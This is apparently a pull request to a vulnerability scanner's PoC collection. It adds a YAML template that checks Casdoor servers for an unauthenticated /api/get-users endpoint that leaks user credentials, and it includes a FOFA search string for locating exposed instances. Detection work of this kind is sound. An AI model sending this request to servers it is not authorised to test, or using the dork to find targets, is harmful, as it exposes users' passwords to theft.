### PR TITLE
Create poc-yaml-casbin_get_users.yaml

### DIFF
--- a/pocs/poc-yaml-casbin_get_users.yaml
+++ b/pocs/poc-yaml-casbin_get_users.yaml
@@ -1,0 +1,16 @@
+name: poc-yaml-casbin_get_users
+transport: http
+rules:
+  r0:
+    request:
+      method: GET
+      path: /api/get-users?p=123&pageSize=123
+      follow_redirects: false
+    expression: >-
+      response.status == 200 && response.body_string.contains("password") &&
+      response.body_string.contains("user")
+expression: r0()
+detail:
+  author: ''
+  links:
+    - https://blog.csdn.net/weixin_46801402/article/details/127646586


### PR DESCRIPTION
漏洞描述：

Casbin get-users api接口存在账号密码泄漏漏洞，攻击者通过漏洞可以获取用户敏感信息。

fofa：title="Casdoor"

**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的
Casbin的api接口存在账号密码泄漏漏洞，攻击者通过漏洞可以获取web后台权限。
## 测试环境

fofa：title="Casdoor"

## 备注
